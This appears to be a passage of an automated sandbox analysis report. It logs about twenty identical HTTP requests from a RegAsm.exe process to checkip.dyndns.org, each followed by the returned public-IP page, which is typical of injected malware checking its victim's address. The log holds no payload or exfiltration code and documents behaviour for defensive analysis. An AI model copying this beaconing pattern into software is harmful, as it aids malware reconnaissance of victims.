                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            87192.168.2.450191132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:06.700516939 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:08.381100893 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:08 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            88192.168.2.450194132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:09.883944988 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:10.577280998 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:10 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            89192.168.2.450197132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:12.031507969 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:12.727247000 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:12 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            90192.168.2.450200132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:14.172290087 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:14.859371901 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:14 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            91192.168.2.450205132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:18.321942091 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:19.019793987 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:18 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            92192.168.2.450208132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:20.494981050 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:21.214761972 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:21 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            93192.168.2.450211132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:22.695456982 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:23.384692907 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:23 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            94192.168.2.450214132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:25.003648996 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:25.678472042 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:25 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            95192.168.2.450217132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:27.185305119 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:27.870181084 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:27 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            96192.168.2.450220132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:29.308823109 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:41:30.008941889 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:29 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            97192.168.2.450223132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:31.445588112 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:32.138972998 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:32 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            98192.168.2.450226132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:33.816159010 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:34.491478920 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:34 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            99192.168.2.450229132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:36.312457085 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:36.983139038 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:36 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            100192.168.2.450232132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:39.039112091 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:39.719543934 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            101192.168.2.450235132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:41.151750088 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:41.842938900 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:41 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            102192.168.2.450238132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:43.292172909 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:43.965816975 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:43 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            103192.168.2.450241132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:45.431349993 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:46.103895903 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:46 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            104192.168.2.450243132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:46.200937033 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:46.898531914 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:46 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            105192.168.2.450246132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:48.621316910 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:49.290138006 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:49 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            106192.168.2.450249132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:50.731112003 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:51.424479008 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            107192.168.2.450252132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:53.039181948 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:53.731043100 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:53 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


